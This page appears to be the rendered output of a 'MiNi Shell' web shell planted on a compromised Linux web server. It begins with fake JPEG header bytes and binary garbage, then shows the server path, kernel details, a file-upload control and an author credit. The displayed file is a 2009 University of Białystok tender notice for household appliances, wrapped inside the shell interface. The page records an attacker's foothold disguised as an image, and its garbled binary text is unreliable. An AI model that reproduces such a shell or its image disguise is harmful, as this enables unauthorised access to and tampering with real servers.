JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090831/143673-N-2009.html

<p class="kh_header"><b>Białystok: Dostawa sprzętu AGD dla jednostek Uniwersytetu w Białymstoku przetarg II- Dzp-55/D/2009</b><br>
<b>Numer ogłoszenia: 143673 - 2009; data zamieszczenia: 31.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet w Białymstoku , ul. M. Skłodowskiej-Curie 14, 15-097 Białystok, woj. podlaskie, tel. 085 7457117, faks 085 745 70 73.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uwb.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu AGD dla jednostek Uniwersytetu w Białymstoku przetarg II- Dzp-55/D/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa elektrycznego sprzętu gospodarstwa domowego tj. odkurzacze (zwykłe, piorące, przemysłowe, profesjonalne) - 18 szt., czajniki elektryczne - 102 szt., chłodziarki - 24 szt., wentylatory pokojowe wolnostojące - 13 szt., przemysłowe pralnico-wirówki - 4 szt., zmywarki do zabudowy- 1 szt., chłodziarko-zamrażarki wolnostojące - 6 szt., kuchenki mikrofalowe - 1 szt., płytki elektryczne dwupalnikowe - 1 szt., zmywarki do naczyń 
- 1 szt., kostkarki do lodu - 1 szt., zamrażarki szufladowe - 1 szt., kuchenki elektryczne wolnostojące - 3 szt., 
pralki automatyczne - 3 szt., grzejniki olejowe - 2 szt. dla jednostek Uniwersytetu w Białymstoku w ilościach 
i wymaganiach zgodnie z Opisem przedmiotu zamówienia stanowiącym pkt 3 SIWZ.
Zakres zamówienia poniżej 206 000 tys. euro..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9, 39.71.11.10-3, 39.71.11.20-6, 39.71.11.30-9, 39.71.00.00-2, 39.71.13.62-4, 39.71.14.20-9, 39.71.32.00-5, 39.71.71.00-2, 39.71.31.00-4, 42.99.90.00-5, 42.71.61.20-5, 42.62.11.00-0, 39.71.13.61-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą się ubiegać Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 uPzp, a w szczególności:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności określonej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi 
do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.: 
- w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali min. 2 zamówienia, odpowiadające swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentów potwierdzających, że te dostawy zostały wykonane należycie,
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Sposób oceny spełniania warunków:
Ocena spełniania warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach, 
o których mowa w pkt 6 SIWZ, dołączonych do oferty wg formuły spełnia - nie spełnia. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż Wykonawca spełnia wymienione warunki. Uzupełnienie wymaganych dokumentów będzie możliwe po upływie terminu składania ofert, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.
W przypadku wątpliwości co do treści dokumentów złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu, Zamawiający może wezwać Wykonawców w określonym przez siebie terminie
do złożenia wyjaśnień. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu, nie później niż w dniu, w którym upłynął termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> OŚWIADCZENIA:
1)	oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 pkt 1-3 uPzp (wg załączonego wzoru druku - zał. nr 3 do SIWZ), 
2)	oświadczenie, że Wykonawca nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 uPzp (wg załączonego wzoru druku - zał. nr 4 do SIWZ), 
DOKUMENTY:
1)	W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 uPzp, Zamawiający żąda złożenia:
-  aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności  gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2)	W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy 
i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, 
lub przedstawienia pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, Zamawiający żąda:
- wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw 
   w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres 
   prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom
   stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz 
   załączenia dokumentów potwierdzających, że te dostawy zostały wykonane należycie - wg załączonego wzoru  
   druku - zał. nr 5 do SIWZ.
Uwaga: Zamawiający uzna za dostawę odpowiadającą swoim rodzajem i wartością przedmiotowi zamówienia, dostawę wykonaną dla jednego zleceniodawcy, polegającą na dostawie sprzętu gospodarstwa domowego o wartości nie mniejszej niż: 
dla zadania 1,2,5,6,7: 2 000,00  PLN; dla zadania 3: 40 000,00  PLN; dla zadania 4,8: 5 000,00 PLN; 

dla zadania 9: 15 000,00 zł.
3)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 6 DOKUMENTY ppkt 1 składa dokument lub dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości
4)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania 
nie wydaje się dokumentu lub dokumentów potwierdzających odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym lub organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
5)	Wykonawca składa wszystkie dokumenty w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
6)	Wykonawca składa wszystkie dokumenty sporządzone w języku obcym wraz z tłumaczeniem na język polski, tłumaczenie musi być poświadczone przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uwb.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet w Białymstoku, Dział Zamówień Publicznych ul. M. Skłodowskiej - Curie 14, 15-097 Białystok, piętro V, p. 503..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2009 godzina 09:30, miejsce: Uniwersytet w Białymstoku, Kancelaria Ogólna, ul. M. Skłodowskiej-Curie 14, 15-097 Białystok, piętro X, p. 1008.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa sprzętu AGD dla Wydziału Historyczno - Socjologicznego Uniwersytetu 
                   w Białymstoku  przy Placu Uniwersyteckim 1..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa sprzętu AGD dla Wydziału Historyczno - Socjologicznego Uniwersytetu w Białymstoku w ilościach:
odkurzacze - 3 szt., czajniki elektryczne, bezprzewodowe - 6 szt., chłodziarka 1 szt. - zgodnie z wymaganiami określonymi w Opisie przedmiotu zamówienia stanowiącym pkt. 3 SIWZ.
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9, 39.71.11.30-9, 39.71.00.00-2, 42.99.90.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa sprzętu AGD dla Wydziału Ekonomii i Zarządzania przy 
ul. Warszawskiej 63, Wydziału Fizyki przy ul Lipowej 41, Wydziału Matematyki
 i Informatyki przy ul. Sosnowej 64, Instytutu Chemii przy ul. Hurtowej 1 oraz dla Studium Praktycznej Nauki Języków Obcych przy ul. M. Skłodowskiej-Curie 14 Uniwersytetu w Białymstoku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa sprzętu AGD dla jednostek Uniwersytetu w Białymstoku w ilościach:
czajniki elektryczne, bezprzewodowe - 34 szt., chłodziarko-zamrażarki 2 szt. - zgodnie z wymaganiami określonymi w Opisie przedmiotu zamówienia stanowiącym pkt. 3 SIWZ.
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.70.00.00-9, 39.71.11.10-3, 30.71.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa sprzętu AGD dla Domu Studenta Nr 2 Uniwersytetu w Białymstoku
                     przy  ul. Krakowskiej 9a..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa sprzętu AGD dla Domu Studenta Nr 2 Uniwersytetu w Białymstoku w ilościach:
Przemysłowe pralnico-wirówki - 4 szt. zgodnie z wymaganiami określonymi w Opisie przedmiotu zamówienia stanowiącym pkt. 3 SIWZ.
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9, 39.71.32.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa sprzętu AGD dla administracji centralnej Uniwersytetu w Białymstoku przy ul. Marii Skłodowskiej-Curie 14..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa sprzętu AGD dla administracji centralnej Uniwersytetu w Białymstoku w ilościach:
Wentylatory pokojowe wolnostojące - 12 szt., czajniki elektryczne, bezprzewodowe - 30 szt., zmywarka do zabudowy - 1 szt., chłodziarko-zamrażarki wolnostojące - 2 szt., kuchenka mikrofalowa - 1 szt., odkurzacz - 1 szt. - zgodnie z wymaganiami określonymi w Opisie przedmiotu zamówienia stanowiącym pkt. 3 SIWZ.
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9, 39.71.71.00-2, 39.71.00.00-2, 39.71.31.00-4, 38.71.11.10-3, 39.71.13.62-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa sprzętu AGD dla Wydziału Prawa Uniwersytetu w Białymstoku przy 
                   ul. Mickiewicza 1..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa sprzętu AGD dla Wydziału Prawa Uniwersytetu w Białymstoku w ilościach:
Odkurzacze - 3 szt., czajniki elektryczne, bezprzewodowe - 6 szt., płytka elektryczna, dwupalnikowa - 1 szt., grzejnik olejowy - 2 szt. - zgodnie z wymaganiami określonymi w Opisie przedmiotu zamówienia stanowiącym pkt. 3 SIWZ.
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9, 39.71.00.00-2, 39.71.14.20-9, 44.62.11.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa sprzętu AGD dla Studium Wychowania Fizycznego i Sportu Uniwersytetu   
                w Białymstoku przy ul. Świerkowej 20A..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa sprzętu AGD dla Studium Wychowania Fizycznego i Sportu Uniwersytetu w Białymstoku
 w ilościach:
Odkurzacz przemysłowy - 1szt., odkurzacz piorący - 1 szt. - zgodnie z wymaganiami określonymi w Opisie przedmiotu zamówienia stanowiącym pkt. 3 SIWZ.
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9, 42.99.90.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa sprzętu AGD dla Wydziału Pedagogiki i Psychologii Uniwersytetu   
                w Białymstoku przy ul. Świerkowej 20..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa sprzętu AGD dla Wydziału Pedagogiki i Psychologii Uniwersytetu w Białymstoku w ilościach:
Zmywarka do naczyń - 1szt., odkurzacze - 4 szt., czajniki elektryczne, bezprzewodowe - 6 szt. - zgodnie
 z wymaganiami określonymi w Opisie przedmiotu zamówienia stanowiącym pkt. 3 SIWZ.
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9, 39.71.31.00-4, 39.71.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa sprzętu AGD dla Instytutu Biologii Uniwersytetu w Białymstoku przy
                        ul. Świerkowej 20 B..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa sprzętu AGD dla Instytutu Biologii Uniwersytetu w Białymstoku w ilościach:
Kostkarka do lodu - 1szt., zamrażarka szufladowa - 1 szt., chłodziarka - 1 szt., odkurzacze profesjonalne
- 3 szt., chłodziarko-zamrażarki - 2 szt.  - zgodnie z wymaganiami określonymi w Opisie przedmiotu zamówienia stanowiącym pkt. 3 SIWZ.
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9, 39.71.00.00-2, 39.71.11.20-6, 42.99.90.00-5, 39.71.11.10-3, 39.71.11.30-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa sprzętu AGD dla budynku Uniwersytetu w Białymstoku przy
                        ul. Pogodnej 65..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa sprzętu AGD dla budynku Uniwersytetu w Białymstoku przy ul. Pogodnej 65 w ilościach:
Chłodziarki wolnostojące - 22 szt., czajniki elektryczne, bezprzewodowe - 20 szt., odkurzacze - 2 szt., wentylator pokojowy wolnostojący - 1 szt., kuchenki elektryczne wolnostojące - 3 szt., pralki automatyczne
- 3 szt.  - zgodnie z wymaganiami określonymi w Opisie przedmiotu zamówienia stanowiącym pkt. 3 SIWZ.
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9, 39.71.00.00-2, 39.71.11.30-9, 39.71.71.00-2, 39.71.13.61-7, 42.71.61.20-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com